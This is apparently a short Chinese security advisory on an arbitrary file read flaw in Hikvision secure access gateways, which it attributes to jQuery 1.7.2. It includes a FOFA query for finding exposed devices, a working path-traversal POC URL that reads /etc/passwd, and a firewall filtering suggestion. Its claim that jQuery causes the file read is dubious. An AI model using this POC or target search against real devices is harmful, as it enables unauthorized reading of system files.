通杀？海康威视安全接入网关任意文件读取漏洞

声明：本文提供的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，如用于其他用途，由使用者承担全部法律及连带责任，与工具作者和本公众号无关。   背景海康威视安全接入网关使用jquery-1.7.2JavaScript代码库（框架），jQuery 1.7.2版本存在任意文件读取漏洞。影响范围jquery-1.7.2FOFA:body="webui/js/jquerylib/jquery-1.7.2.min.js"危害级别：中漏洞复现POC：/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down除此之外，像安博通深度安全网关等使用jquery-1.7.2 JavaScript代码库（框架）的设备同样存在此漏洞修复建议临时修复：在防火墙中添加../../参数及相关变形的过滤规则。goby&nuclei检测公众号回复“jquery-1.7.2”获取，供运维人员用于检测。最后附百度百科：jQuery是一个快速、简洁的JavaScrip ………………………………